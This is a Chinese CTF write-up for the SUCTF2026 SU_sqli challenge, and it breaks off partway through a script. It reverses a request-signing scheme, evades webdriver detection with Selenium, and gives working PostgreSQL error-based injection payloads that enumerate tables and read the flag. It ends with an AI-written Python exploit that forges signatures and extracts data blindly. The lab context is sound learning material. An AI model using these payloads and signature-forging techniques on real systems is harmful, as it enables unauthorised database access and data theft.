SUCTF2026

时间上跟软件系统安全赛撞了，后面只打了最后半天，牢出了三个题，大型比赛的收获真的太多了

SU_sqli

#pgsql注入point报错注入绕过

Zhou discovered a SQL injection vulnerability. Are you able to compromise the target?

页面提示搜索公共笔记，但是需要一个有效的签名，并且有一个tip

Tip: slow is smooth.

另外引入了两个js文件

代码分析

/static/wasm_exec.js这个文件是 Go 官方提供的 WebAssembly (WASM) 运行时桥接文件，简而言之就是让Go程序能在浏览器或者Node.js环境中运行

然后看看app.js文件

挨个看一下

  const _s = [
    "L2FwaS9zaWdu",
    "L2FwaS9xdWVyeQ==",
    "UE9TVA==",
    "Y29udGVudC10eXBl",
    "YXBwbGljYXRpb24vanNvbg==",
    "Y3J5cHRvMS53YXNt",
    "Y3J5cHRvMi53YXNt"
  ];
const _d = (i) => atob(_s[i]);

_s做了一个字符串混淆，这些都是base64编码，解码后就是

const _s = [
  "/api/sign",
  "/api/query",
  "POST",
  "content-type",
  "application/json",
  "crypto1.wasm",
  "crypto2.wasm"
];

而const _d = (i) => atob(_s[i]);则是索引每个字符串并调用atob函数进行base64解码后赋值给_d[i]

const $ = (id) => document.getElementById(id);
const out = $("out");
const err = $("err");

定义一个获取id元素的函数并尝试获取页面中id为out和err的元素

看看最后的事件操作

window.addEventListener("DOMContentLoaded", () => {
  $("run").addEventListener("click", doQuery);
  $("q").addEventListener("keydown", (e) => {
    if (e.key === "Enter") doQuery();
  });
});

无论是点击查询按钮还是回车都会执行doQuery函数，我们跟进看看doQuery干了啥

doQuery()

async function doQuery() {
    //清空错误信息和输出信息
  err.textContent = "";
  out.textContent = "";
    //尝试获取id为q的内容，也就是keyword的值
  const q = $("q").value || "";
  if (!q) {
    err.textContent = "empty";
    return;
  }
  try {
    await loadWasm();

然后调用loadWasm函数分别加载crypto.wasm和crypto2.wasm文件并获取__suPrep和__suFinish两个加密功能方法

async function loadWasm() {
  if (wasmReady) return wasmReady;
  wasmReady = (async () => {
    const go1 = new Go();
    const resp1 = await fetch("/static/" + _d(5));
    const buf1 = await resp1.arrayBuffer();
    const { instance: inst1 } = await WebAssembly.instantiate(buf1, go1.importObject);
    go1.run(inst1);

    const go2 = new Go();
    const resp2 = await fetch("/static/" + _d(6));
    const buf2 = await resp2.arrayBuffer();
    const { instance: inst2 } = await WebAssembly.instantiate(buf2, go2.importObject);
    go2.run(inst2);

    for (let i = 0; i < 100; i++) {
      if (typeof globalThis.__suPrep === "function" && typeof globalThis.__suFinish === "function") return true;
      await new Promise((r) => setTimeout(r, 10));
    }
    throw new Error("wasm init");
  })();
  return wasmReady;
}

加载完成后调用getSignMaterial方法

async function getSignMaterial() {
  const res = await fetch(_d(0), { method: "GET" });
  const data = await res.json();
  if (!data.ok) throw new Error(data.error || "sign");
  return data.data;
}

先是get请求去访问/api/sign获取签名，用json函数将内容进行解析，最后返回签名内容

访问看看

{
  "ok": true,
  "data": {
    "algo": "v6",
    "nonce": "Z1wIVIhaLo7RsmDi",
    "salt": "mkiquL0nm-4",
    "seed": "dA9F1fm8j173.KMIaAvNiRIos.un0rF0SRNxuhRHotxQ.XGIR79vgET6aeLO4tyj6UQ",
    "ts": 1775102696348
  }
}

const ua = navigator.userAgent || "";
const uaData = navigator.userAgentData;
const brands = uaData && uaData.brands ? uaData.brands.map((b) => b.brand + ":" + b.version).join(",") : "";
const tz = (() => {
  try {
    return Intl.DateTimeFormat().resolvedOptions().timeZone || "";
  } catch {
    return "";
  }
})();
const intl = (() => {
  try {
    return Intl.DateTimeFormat().resolvedOptions().locale ? "1" : "0";
  } catch {
    return "0";
  }
})();
const wd = navigator.webdriver ? "1" : "0";
const probe = "wd=" + wd + ";tz=" + tz + ";b=" + brands + ";intl=" + intl;

一些获取浏览器指纹信息的操作，包括UA头中浏览器信息，时区，是否支持国际化，以及是否使用webdriver自动化工具等

最后拼成一个probe变量

const pre = globalThis.__suPrep(
  _d(2),
  _d(1),
  q,
  material.nonce,
  String(material.ts),
  material.seed,
  material.salt,
  ua,
  probe
);

调用__suPrep函数进行初步加密处理

pre = __suPrep("POST", "/api/query", q, nonce, ts, seed, salt, ua, probe)
secret2 = unscramble(pre, nonce, ts)

接着进行了第二轮加密

  const secret2 = unscramble(pre, material.nonce, material.ts);
unscramble函数=>
  function unscramble(pre, nonceB64, ts) {
    const buf = b64UrlToBytes(pre);
    if (buf.length !== 32) throw new Error("prep");
    for (let i = 0; i < 8; i++) {
      const o = i * 4;
      let w =
        (buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
      w = rotr32(w, rotScr[i]);
      buf[o] = w & 0xff;
      buf[o + 1] = (w >>> 8) & 0xff;
      buf[o + 2] = (w >>> 16) & 0xff;
      buf[o + 3] = (w >>> 24) & 0xff;
    }
    const mask = maskBytes(nonceB64, ts);
    for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
    return buf;
  }

unscramble函数进行了位旋转和异或运算

const mixed = mixSecret(secret2, probe, material.ts);
mixSecret=>
  function mixSecret(buf, probe, ts) {
    const mask = probeMask(probe, ts);
    if (mask[0] & 1) {
      for (let i = 0; i < 32; i += 2) {
        const t = buf[i];
        buf[i] = buf[i + 1];
        buf[i + 1] = t;
      }
    }
    if (mask[1] & 2) {
      for (let i = 0; i < 8; i++) {
        const o = i * 4;
        let w =
          (buf[o] | (buf[o + 1] << 8) | (buf[o + 2] << 16) | (buf[o + 3] << 24)) >>> 0;
        w = rotl32(w, 3);
        buf[o] = w & 0xff;
        buf[o + 1] = (w >>> 8) & 0xff;
        buf[o + 2] = (w >>> 16) & 0xff;
        buf[o + 3] = (w >>> 24) & 0xff;
      }
    }
    for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
    return buf;
  }

把获取到的指纹信息也放进去加密了

const sig = globalThis.__suFinish(
  _d(2),
  _d(1),
  q,
  material.nonce,
  String(material.ts),
  bytesToB64Url(mixed),
  probe
);

最后调用__suFinish函数生成最终的签名sig

  const res = await fetch(_d(1), {
    method: _d(2),
    headers: { [_d(3)]: _d(4) },
    body: JSON.stringify({ q, nonce: material.nonce, ts: material.ts, sign: sig })
  });
  const data = await res.json();
  if (!data.ok) {
    err.textContent = data.error || "error";
    return;
  }
  out.textContent = JSON.stringify(data.data, null, 2);
} catch (e) {
  err.textContent = String(e.message || e);
}

带着sig签名进行查询请求操作并将最终的json内容回显

思路分析

很显然，这里对传入的参数进行了一些签名加密，请求的路由是/api/query，如果直接对这个路由进行传参或者跑sqlmap的话是不行的，后台会进行一个校验，这个之前做vnctf的时候就接触过，一方面是需要逆向解密，另一方面是使用python的Selenium去进行操作，但是不知道Selenium会不会被ban，写个脚本试一下

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait

# 配置 Chrome 选项以绕过检测
options = Options()
options.add_experimental_option("excludeSwitches", ["enable-automation"])
options.add_experimental_option('useAutomationExtension', False)

driver = webdriver.Chrome(options=options)

# 核心：绕过 navigator.webdriver 检测
driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {
    "source": """
    Object.defineProperty(navigator, 'webdriver', {
      get: () => undefined
    })
  """
})

TARGET_URL = "http://101.245.108.250:10001/"
driver.get(TARGET_URL)


def run_query(payload):
    try:
        # 清除之前的状态（模拟页面逻辑）
        driver.execute_script(
            "document.getElementById('err').textContent = ''; document.getElementById('out').textContent = '';")

        input_box = driver.find_element(By.ID, "q")
        input_box.clear()
        input_box.send_keys(payload)

        run_button = driver.find_element(By.ID, "run")
        run_button.click()

        # 使用显式等待：等待 #out 或 #err 里的文字不再是空的
        # 这里的 15 秒是为了响应 "slow is smooth"
        wait = WebDriverWait(driver, 15)

        def check_panels(d):
            out_txt = d.find_element(By.ID, "out").text.strip()
            err_txt = d.find_element(By.ID, "err").text.strip()
            return out_txt or err_txt

        wait.until(check_panels)

        out_panel = driver.find_element(By.ID, "out")
        err_panel = driver.find_element(By.ID, "err")

        if out_panel.text.strip():
            return out_panel.text
        if err_panel.text.strip():
            return f"ERROR: {err_panel.text}"

        return "No result"
    except Exception as e:
        return f"Exception occurred: {str(e)}"


#测试注入点
print("Testing injection point with '1' ...")
result = run_query("1'")
print(f"Result:\n{result}\n")

# driver.quit()

加了一些配置强行移除自动化扩展和控制标志从而绕过const wd = navigator.webdriver ? "1" : "0";的校验

因为中间会调用loadWasm函数去加载那两个模块进行加密的，如果设置sleep的话也不稳定，所以我直接设置当返回结果不为空的时候再关闭

既然能打，那就开始思考sql方面的问题

直接手注了？

看到这回显是PostgreSQL数据库的错误回显，猜测原始的sql语句大致是这样的

SELECT ... FROM ... WHERE ... = '[q]' LIMIT 20

测一下过滤

--
/*
union
and
;
::
TO_NUMBER
CAST
pg_sleep

需要绕过后面的limit 20，并且我发现后台的sql语句估计是这样的

"SELECT ... WHERE content LIKE '%" + input + "%' LIMIT 20"

打一下报错注入

PostgreSQL 特有报错函数

-- point 类型转换报错
' || (SELECT point((SELECT version()))) || '

-- 数组下标越界
' || (SELECT (array[]::text[])[1]) || '

-- interval 报错
' || (INTERVAL '1 year' + (SELECT version())) || '

打一下

' || (SELECT point(version())) || '

发现有回显

ERROR: invalid input syntax for type point: "PostgreSQL 17.9 (Debian 17.9-1.pgdg13+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 14.2.0-19) 14.2.0, 64-bit" (SQLSTATE 22P02)

后面又测得过滤

' || (SELECT point((SELECT table_name FROM information_schema.tables WHERE table_schema='public'))) || '
过滤了
information_schema

换pgsql原生表

系统表替代 information_schema

' || (SELECT point((SELECT tablename FROM pg_tables WHERE schemaname='public' LIMIT 1 OFFSET 0))) || '
ERROR: invalid input syntax for type point: "posts" (SQLSTATE 22P02)
' || (SELECT point((SELECT tablename FROM pg_tables WHERE schemaname='public' LIMIT 1 OFFSET 1))) || '
ERROR: invalid input syntax for type point: "secrets" (SQLSTATE 22P02)

如果 pg_tables 也被过滤，用 pg_class

' || (SELECT point((SELECT relname FROM pg_class WHERE relkind='r' LIMIT 1 OFFSET 0))) || '
ERROR: invalid input syntax for type point: "posts" (SQLSTATE 22P02)
' || (SELECT point((SELECT relname FROM pg_class WHERE relkind='r' LIMIT 1 OFFSET 1))) || '
ERROR: invalid input syntax for type point: "secrets" (SQLSTATE 22P02)

看到一个secrets表，枚举一下secrets的列名

' || (SELECT point((SELECT attname FROM pg_attribute JOIN pg_class ON pg_attribute.attrelid=pg_class.oid WHERE pg_class.relname='secrets' LIMIT 1 OFFSET 0))) || '
ERROR: invalid input syntax for type point: "cmax" (SQLSTATE 22P02)
' || (SELECT point((SELECT attname FROM pg_attribute JOIN pg_class ON pg_attribute.attrelid=pg_class.oid WHERE pg_class.relname='secrets' LIMIT 1 OFFSET 1))) || '
ERROR: invalid input syntax for type point: "cmin" (SQLSTATE 22P02)
' || (SELECT point((SELECT attname FROM pg_attribute JOIN pg_class ON pg_attribute.attrelid=pg_class.oid WHERE pg_class.relname='secrets' LIMIT 1 OFFSET 2))) || '
ERROR: invalid input syntax for type point: "ctid" (SQLSTATE 22P02)
' || (SELECT point((SELECT attname FROM pg_attribute JOIN pg_class ON pg_attribute.attrelid=pg_class.oid WHERE pg_class.relname='secrets' LIMIT 1 OFFSET 3))) || '
ERROR: invalid input syntax for type point: "flag" (SQLSTATE 22P02)

最后直接读flag

' || (SELECT point((SELECT flag FROM secrets LIMIT 1 OFFSET 0))) || '
ERROR: invalid input syntax for type point: "SUCTF{P9s9L_!Nject!On_IS_3@$Y_RiGht}" (SQLSTATE 22P02)

哈哈哈哈哈好像我这个手注绕过好像不是预期解？估计需要逆向那些加密去打自动化脚本吧

AI一把梭

尝试让ai分析了一下加密逻辑写了个exp

#!/usr/bin/env python3
"""
Helpers for reversing the visible JS-side transforms in app.js and for
reproducing the full signing / exploitation flow from source.
"""

from __future__ import annotations

import argparse
import base64
import json
import re
import sys
from typing import Iterable

try:
    import requests
except ImportError:  # pragma: no cover
    requests = None


ROT_SCR = (1, 5, 9, 13, 17, 3, 11, 19)

SALT_SEED = 0xA3B1C2D3
SALT_MSG = 0x1F2E3D4C
SALT_UA = 0xB16B00B5
SALT_PERM = 0xC0DEC0DE
WINDOW_MS = 30000

DEFAULT_BASE = "http://127.0.0.1:8080"
DEFAULT_UA = (
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
)

ERROR_TEMPLATES = (
    "' || (SELECT CASE WHEN ({cond}) THEN "
    "JSON_VALUE('{{\"a\":\"x\"}}','$.a' RETURNING INTEGER ERROR ON ERROR) "
    "ELSE 0 END) || '",
    "' || (SELECT CASE WHEN ({cond}) THEN "
    "JSON_VALUE('{{\"a\":\"x\"}}','$.a' RETURNING INTEGER ON ERROR ERROR) "
    "ELSE 0 END) || '",
)


def b64url_to_bytes(data: str) -> bytes:
    text = data.replace("-", "+").replace("_", "/")
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text)


def bytes_to_b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def rotl32(x: int, r: int) -> int:
    r %= 32
    return ((x << r) | (x >> (32 - r))) & 0xFFFFFFFF


def rotr32(x: int, r: int) -> int:
    r %= 32
    return ((x >> r) | (x << (32 - r))) & 0xFFFFFFFF


def xor_bytes(left: bytes, right: bytes) -> bytes:
    if len(left) != len(right):
        raise ValueError(f"xor length mismatch: {len(left)} != {len(right)}")
    return bytes(a ^ b for a, b in zip(left, right))


def each_u32_le(buf: bytes) -> Iterable[int]:
    if len(buf) != 32:
        raise ValueError(f"expected 32 bytes, got {len(buf)}")
    for off in range(0, 32, 4):
        yield int.from_bytes(buf[off : off + 4], "little")


def words_to_bytes(words: Iterable[int]) -> bytes:
    return b"".join((w & 0xFFFFFFFF).to_bytes(4, "little") for w in words)


def mask_bytes(nonce_b64: str, ts: int) -> bytes:
    nonce = b64url_to_bytes(nonce_b64)
    state = 0
    for byte in nonce:
        state = ((state * 131) + byte) & 0xFFFFFFFF
    hi = ts // 0x100000000
    state = (state ^ (ts & 0xFFFFFFFF) ^ (hi & 0xFFFFFFFF)) & 0xFFFFFFFF

    out = bytearray(32)
    for i in range(32):
        state ^= (state << 13) & 0xFFFFFFFF
        state ^= (state >> 17) & 0xFFFFFFFF
        state ^= (state << 5) & 0xFFFFFFFF
        state &= 0xFFFFFFFF
        out[i] = state & 0xFF
    return bytes(out)


def probe_mask(probe: str, ts: int) -> bytes:
    state = 0
    for ch in probe:
        state = ((state * 33) + ord(ch)) & 0xFFFFFFFF
    hi = ts // 0x100000000
    state = (state ^ (ts & 0xFFFFFFFF) ^ (hi & 0xFFFFFFFF)) & 0xFFFFFFFF

    out = bytearray(32)
    for i in range(32):
        state = ((state * 1103515245) + 12345) & 0xFFFFFFFF
        out[i] = (state >> 16) & 0xFF
    return bytes(out)


def unscramble(pre_b64: str, nonce_b64: str, ts: int) -> bytes:
    buf = b64url_to_bytes(pre_b64)
    if len(buf) != 32:
        raise ValueError(f"`pre` must decode to 32 bytes, got {len(buf)}")

    rotated = words_to_bytes(
        rotr32(word, rot) for word, rot in zip(each_u32_le(buf), ROT_SCR)
    )
    return xor_bytes(rotated, mask_bytes(nonce_b64, ts))


def scramble(secret: bytes, nonce_b64: str, ts: int) -> str:
    if len(secret) != 32:
        raise ValueError(f"`secret` must be 32 bytes, got {len(secret)}")

    masked = xor_bytes(secret, mask_bytes(nonce_b64, ts))
    rotated = words_to_bytes(
        rotl32(word, rot) for word, rot in zip(each_u32_le(masked), ROT_SCR)
    )
    return bytes_to_b64url(rotated)


def mix_secret(secret: bytes, probe: str, ts: int) -> bytes:
    if len(secret) != 32:
        raise ValueError(f"`secret` must be 32 bytes, got {len(secret)}")

    mask = probe_mask(probe, ts)
    buf = bytearray(secret)

    if mask[0] & 1:
        for i in range(0, 32, 2):
            buf[i], buf[i + 1] = buf[i + 1], buf[i]

    if mask[1] & 2:
        buf[:] = words_to_bytes(rotl32(word, 3) for word in each_u32_le(bytes(buf)))

    return xor_bytes(bytes(buf), mask)


def unmix_secret(mixed: bytes, probe: str, ts: int) -> bytes:
    if len(mixed) != 32:
        raise ValueError(f"`mixed` must be 32 bytes, got {len(mixed)}")

    mask = probe_mask(probe, ts)
    buf = bytearray(xor_bytes(mixed, mask))

    if mask[1] & 2:
        buf[:] = words_to_bytes(rotr32(word, 3) for word in each_u32_le(bytes(buf)))

    if mask[0] & 1:
        for i in range(0, 32, 2):
            buf[i], buf[i + 1] = buf[i + 1], buf[i]

    return bytes(buf)


def parse_32_bytes(value: str) -> bytes:
    if re.fullmatch(r"[0-9a-fA-F]{64}", value):
        raw = bytes.fromhex(value)
    else:
        raw = b64url_to_bytes(value)

    if len(raw) != 32:
        raise ValueError(f"expected 32 bytes, got {len(raw)}")
    return raw


def print_formats(name: str, data: bytes) -> None:
    print(f"{name}.hex    = {data.hex()}")
    print(f"{name}.b64url = {bytes_to_b64url(data)}")


def rot_words(buf: bytes, r: int) -> bytes:
    out = bytearray(32)
    for i in range(8):
        word = int.from_bytes(buf[i * 4 : i * 4 + 4], "little")
        out[i * 4 : i * 4 + 4] = rotl32(word, r).to_bytes(4, "little")
    return bytes(out)


def permute(buf: bytearray) -> None:
    for i in range(8):
        word = int.from_bytes(buf[i * 4 : i * 4 + 4], "little")
        buf[i * 4 : i * 4 + 4] = rotl32(word, (i * 7 + 3) % 31).to_bytes(
            4, "little"
        )


def permute_inv(buf: bytearray) -> None:
    for i in range(8):
        word = int.from_bytes(buf[i * 4 : i * 4 + 4], "little")
        buf[i * 4 : i * 4 + 4] = rotl32(word, -((i * 7 + 3) % 31)).to_bytes(
            4, "little"
        )


def kdf_table(salt: int, size: int) -> list[int]:
    out = [0] * 16
    value = (salt ^ ((size * 0x9E3779B9) & 0xFFFFFFFF)) & 0xFFFFFFFF
    for i in range(16):
        value ^= (value << 13) & 0xFFFFFFFF
        value ^= (value >> 17) & 0xFFFFFFFF
        value ^= (value << 5) & 0xFFFFFFFF
        out[i] = (value + (i * 0x85EBCA6B)) & 0xFFFFFFFF
    return out


def kdf(data: bytes, salt: int) -> bytes:
    tab = kdf_table(salt, len(data))
    value = (0x811C9DC5 ^ salt ^ tab[len(data) & 15]) & 0xFFFFFFFF
    for i, ch in enumerate(data):
        value ^= (ch + tab[i & 15]) & 0xFFFFFFFF
        value = (value * 0x01000193) & 0xFFFFFFFF
        if tab[(i + 3) & 15] & 1:
            value ^= value >> 13
        if tab[(i + 7) & 15] & 2:
            value = rotl32(value, tab[i & 15] & 7)

    value = (value ^ salt ^ tab[(len(data) + 7) & 15]) & 0xFFFFFFFF
    if tab[1] & 4:
        value ^= rotl32(value, tab[2] & 15)

    out = bytearray(32)
    for i in range(8):
        value ^= (value << 13) & 0xFFFFFFFF
        value ^= value >> 17
        value ^= (value << 5) & 0xFFFFFFFF
        value = (
            value + ((i * 0x9E3779B9) & 0xFFFFFFFF) + salt + tab[i & 15]
        ) & 0xFFFFFFFF
        out[i * 4 : i * 4 + 4] = value.to_bytes(4, "little")

    if tab[0] & 1:
        _ = kdf_table(salt ^ 0xA5A5A5A5, len(data) + 3)
    return bytes(out)


def ua_mix_key(ua: str, salt: str, ts: int) -> bytes:
    if not ua:
        ua = "ua/empty"

    bucket = str(ts // WINDOW_MS)
    msg_a = f"{ua}|{salt}|{bucket}".encode()
    msg_b = f"{bucket}|{salt}|{ua}".encode()
    msg_c = f"{ua}|{bucket}".encode()

    part_a = kdf(msg_a, SALT_UA)
    part_b = kdf(msg_b, SALT_UA ^ 0x13579BDF)
    part_c = kdf(msg_c, SALT_UA ^ 0x2468ACE0)

    mix = xor_bytes(part_a, rot_words(part_b, 5))
    mix = xor_bytes(mix, rot_words(part_c, 11))
    if len(ua) % 7 == 3:
        fake = kdf(f"x|{ua}|{salt}".encode(), 0xDEADBEEF)
        mix = xor_bytes(mix, rot_words(fake, 7))
    return mix


def seed_pack_params(nonce: str, salt: str, ts: int) -> tuple[list[int], list[int], list[int], list[int]]:
    bucket = str(ts // WINDOW_MS)
    msg = f"{nonce}|{salt}|{bucket}".encode()
    key = kdf(msg, SALT_PERM)
    pad_l = [key[i] % 5 for i in range(4)]
    pad_r = [key[i + 4] % 5 for i in range(4)]
    mask = [key[i + 8] for i in range(4)]
    idx = [0, 1, 2, 3]
    pos = 12
    for i in range(3, 0, -1):
        j = key[pos] % (i + 1)
        idx[i], idx[j] = idx[j], idx[i]
        pos += 1
    return idx, pad_l, pad_r, mask


def unpack_seed(seed_pack: str, nonce: str, salt: str, ts: int) -> bytes:
    parts = seed_pack.split(".")
    if len(parts) != 4:
        raise ValueError("bad seed pack")

    perm, pad_l, pad_r, mask = seed_pack_params(nonce, salt, ts)
    chunks = [b"", b"", b"", b""]
    for i, part in enumerate(parts):
        raw = b64url_to_bytes(part)
        idx = perm[i]
        expected = pad_l[idx] + pad_r[idx] + 8
        if len(raw) != expected:
            raise ValueError("bad chunk")

        data = bytearray(raw[pad_l[idx] : pad_l[idx] + 8])
        for j in range(8):
            data[j] ^= (mask[idx] + (j * 17)) & 0xFF
        chunks[idx] = bytes(data)

    return b"".join(chunks)


def sign_request(
    method: str,
    path: str,
    q: str,
    nonce: str,
    ts: int,
    seed_pack: str,
    salt: str,
    ua: str,
) -> str:
    nonce_bytes = b64url_to_bytes(nonce)
    if len(nonce_bytes) < 8:
        raise ValueError("nonce too short")

    k1 = kdf(
        nonce_bytes + ts.to_bytes(8, "little") + b"k9v3_suctf26_sigma",
        SALT_SEED,
    )
    seed_x = bytearray(unpack_seed(seed_pack, nonce, salt, ts))
    dyn = ua_mix_key(ua, salt, ts)
    permute_inv(seed_x)
    seed = xor_bytes(bytes(seed_x), dyn)
    secret = xor_bytes(seed, k1)
    secret2 = xor_bytes(secret, dyn)

    msg = f"{method}|{path}|{q}|{ts}|{nonce}".encode()
    out = bytearray(xor_bytes(secret2, kdf(msg, SALT_MSG)))
    permute(out)
    return bytes_to_b64url(bytes(out))


def require_requests() -> None:
    if requests is None:
        raise RuntimeError("requests is required for HTTP commands")


def make_session(ua: str) -> "requests.Session":
    require_requests()
    session = requests.Session()
    session.headers.update(
        {
            "Accept": "application/json, text/plain, */*",
            "User-Agent": ua,
        }
    )
    return session


def parse_json_response(resp: "requests.Response") -> dict:
    try:
        return resp.json()
    except Exception as exc:
        raise RuntimeError(f"non-json response ({resp.status_code}): {resp.text}") from exc


def fetch_material(
    session: "requests.Session", base: str, timeout: float
) -> dict:
    resp = session.get(f"{base.rstrip('/')}/api/sign", timeout=timeout)
    payload = parse_json_response(resp)
    resp.raise_for_status()
    if not payload.get("ok"):
        raise RuntimeError(payload.get("error") or "failed to get sign material")
    return payload["data"]


def sign_from_args_or_fetch(
    session: "requests.Session",
    base: str,
    timeout: float,
    args: argparse.Namespace,
) -> tuple[dict, str]:
    manual = [args.nonce, args.ts, args.seed, args.salt]
    if any(v is not None for v in manual):
        if not all(v is not None for v in manual):
            raise ValueError("--nonce/--ts/--seed/--salt must be provided together")
        material = {
            "nonce": args.nonce,
            "ts": args.ts,
            "seed": args.seed,
            "salt": args.salt,
        }
    else:
        material = fetch_material(session, base, timeout)

    sign = sign_request(
        method=args.method,
        path=args.path,
        q=args.q,
        nonce=material["nonce"],
        ts=int(material["ts"]),
        seed_pack=material["seed"],
        salt=material["salt"],
        ua=args.ua,
    )
    return material, sign


def do_query(
    session: "requests.Session",
    base: str,
    timeout: float,
    q: str,
) -> tuple[int, dict, dict, str]:
    material = fetch_material(session, base, timeout)
    sign = sign_request(
        method="POST",
        path="/api/query",
        q=q,
        nonce=material["nonce"],
        ts=int(material["ts"]),
        seed_pack=material["seed"],
        salt=material["salt"],
        ua=session.headers["User-Agent"],
    )
    body = {
        "q": q,
        "nonce": material["nonce"],
        "ts": int(material["ts"]),
        "sign": sign,
    }
    resp = session.post(
        f"{base.rstrip('/')}/api/query",
        headers={"Content-Type": "application/json"},
        data=json.dumps(body),
        timeout=timeout,
    )
    return resp.status_code, parse_json_response(resp), material, sign


def inj_payload(cond: str, template: str) -> str:
    return template.format(cond=cond)


def is_error(status: int, payload: dict) -> bool:
    if status != 200:
        raise RuntimeError(f"HTTP {status}: {payload}")
    if payload.get("error") == "blocked":
        raise RuntimeError("WAF blocked payload")
    return not payload.get("ok", False)


def pick_template(session: "requests.Session", base: str, timeout: float) -> str:
    for template in ERROR_TEMPLATES:
        p_true = inj_payload("1=1", template)
        p_false = inj_payload("1=0", template)
        if len(p_true) > 256 or len(p_false) > 256:
            continue
        err_true = is_error(*do_query(session, base, timeout, p_true)[:2])
        err_false = is_error(*do_query(session, base, timeout, p_false)[:2])
        if err_true != err_false:
            return template
    raise RuntimeError("no working error template found")


def check_cond(
    session: "requests.Session",
    base: str,
    timeout: float,
    cond: str,
    template: str,
) -> bool:
    payload = inj_payload(cond, template)
    if len(payload) > 256:
        raise RuntimeError(f"payload too long: {len(payload)}")
    status, data, _, _ = do_query(session, base, timeout, payload)
    return is_error(status, data)


def extract_length(
    session: "requests.Session",
    base: str,
    timeout: float,
    template: str,
    expr: str,
    max_len: int,
) -> int:
    lo, hi = 1, max_len
    while lo <= hi:
        mid = (lo + hi) // 2
        cond = f"length(({expr}))>{mid}"
        if check_cond(session, base, timeout, cond, template):
            lo = mid + 1
        else:
            hi = mid - 1
    return lo


def extract_char(
    session: "requests.Session",
    base: str,
    timeout: float,
    template: str,
    expr: str,
    pos: int,
    low: int,
    high: int,
) -> str:
    lo, hi = low, high
    while lo <= hi:
        mid = (lo + hi) // 2
        cond = f"ascii(substr(({expr}),{pos},1))>{mid}"
        if check_cond(session, base, timeout, cond, template):
            lo = mid + 1
        else:
            hi = mid - 1
    return chr(lo)


def add_http_args(parser: argparse.ArgumentParser) -> None:
    parser.add_argument("--base", default=DEFAULT_BASE, help="base URL")
    parser.add_argument("--ua", default=DEFAULT_UA, help="User-Agent")
    parser.add_argument(
        "--timeout", type=float, default=8.0, help="HTTP timeout in seconds"
    )


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        description="Reverse app.js transforms and reproduce the full sign/query flow"
    )
    sub = parser.add_subparsers(dest="cmd", required=True)

    pre_to_secret = sub.add_parser("pre-to-secret", help="recover secret2 from pre")
    pre_to_secret.add_argument("--pre", required=True)
    pre_to_secret.add_argument("--nonce", required=True)
    pre_to_secret.add_argument("--ts", required=True, type=int)

    pre_to_mixed = sub.add_parser("pre-to-mixed", help="recover mixed from pre")
    pre_to_mixed.add_argument("--pre", required=True)
    pre_to_mixed.add_argument("--nonce", required=True)
    pre_to_mixed.add_argument("--ts", required=True, type=int)
    pre_to_mixed.add_argument("--probe", required=True)

    mixed_to_secret = sub.add_parser(
        "mixed-to-secret", help="recover secret2 from mixed"
    )
    mixed_to_secret.add_argument(
        "--mixed",
        required=True,
        help="32-byte value in hex or base64url",
    )
    mixed_to_secret.add_argument("--probe", required=True)
    mixed_to_secret.add_argument("--ts", required=True, type=int)

    secret_to_pre = sub.add_parser("secret-to-pre", help="rebuild pre from secret2")
    secret_to_pre.add_argument(
        "--secret",
        required=True,
        help="32-byte value in hex or base64url",
    )
    secret_to_pre.add_argument("--nonce", required=True)
    secret_to_pre.add_argument("--ts", required=True, type=int)

    secret_to_mixed = sub.add_parser(
        "secret-to-mixed", help="rebuild mixed from secret2"
    )
    secret_to_mixed.add_argument(
        "--secret",
        required=True,
        help="32-byte value in hex or base64url",
    )
    secret_to_mixed.add_argument("--probe", required=True)
    secret_to_mixed.add_argument("--ts", required=True, type=int)

    material = sub.add_parser("material", help="fetch /api/sign material")
    add_http_args(material)

    sign_cmd = sub.add_parser("sign", help="build a valid sign for a query")
    add_http_args(sign_cmd)
    sign_cmd.add_argument("--q", required=True)
    sign_cmd.add_argument("--method", default="POST")
    sign_cmd.add_argument("--path", default="/api/query")
    sign_cmd.add_argument("--nonce")
    sign_cmd.add_argument("--ts", type=int)
    sign_cmd.add_argument("--seed")
    sign_cmd.add_argument("--salt")

    query_cmd = sub.add_parser("query", help="fetch material, sign, and send query")
    add_http_args(query_cmd)
    query_cmd.add_argument("--q", required=True)
    query_cmd.add_argument("--show-material", action="store_true")
    query_cmd.add_argument("--show-sign", action="store_true")

    pick_tpl = sub.add_parser("pick-template", help="find a working error template")
    add_http_args(pick_tpl)

    check = sub.add_parser("check-cond", help="test a boolean SQL condition")
    add_http_args(check)
    check.add_argument("--cond", required=True)
    check.add_argument("--template")

    dump = sub.add_parser("dump-flag", help="extract data with the error oracle")
    add_http_args(dump)
    dump.add_argument(
        "--expr",
        default="select flag from secrets limit 1",
        help="SQL scalar expression to extract",
    )
    dump.add_argument("--template")
    dump.add_argument("--max-len", type=int, default=96)
    dump.add_argument("--low", type=int, default=32)
    dump.add_argument("--high", type=int, default=126)

    return parser


def main() -> int:
    parser = build_parser()
    args = parser.parse_args()

    try:
        if args.cmd == "pre-to-secret":
            secret = unscramble(args.pre, args.nonce, args.ts)
            print_formats("secret", secret)
            return 0

        if args.cmd == "pre-to-mixed":
            secret = unscramble(args.pre, args.nonce, args.ts)
            mixed = mix_secret(secret, args.probe, args.ts)
            print_formats("secret", secret)
            print_formats("mixed", mixed)
            return 0

        if args.cmd == "mixed-to-secret":
            secret = unmix_secret(parse_32_bytes(args.mixed), args.probe, args.ts)
            print_formats("secret", secret)
            return 0

        if args.cmd == "secret-to-pre":
            pre = scramble(parse_32_bytes(args.secret), args.nonce, args.ts)
            print(f"pre.b64url = {pre}")
            return 0

        if args.cmd == "secret-to-mixed":
            mixed = mix_secret(parse_32_bytes(args.secret), args.probe, args.ts)
            print_formats("mixed", mixed)
            return 0

        session = make_session(args.ua)

        if args.cmd == "material":
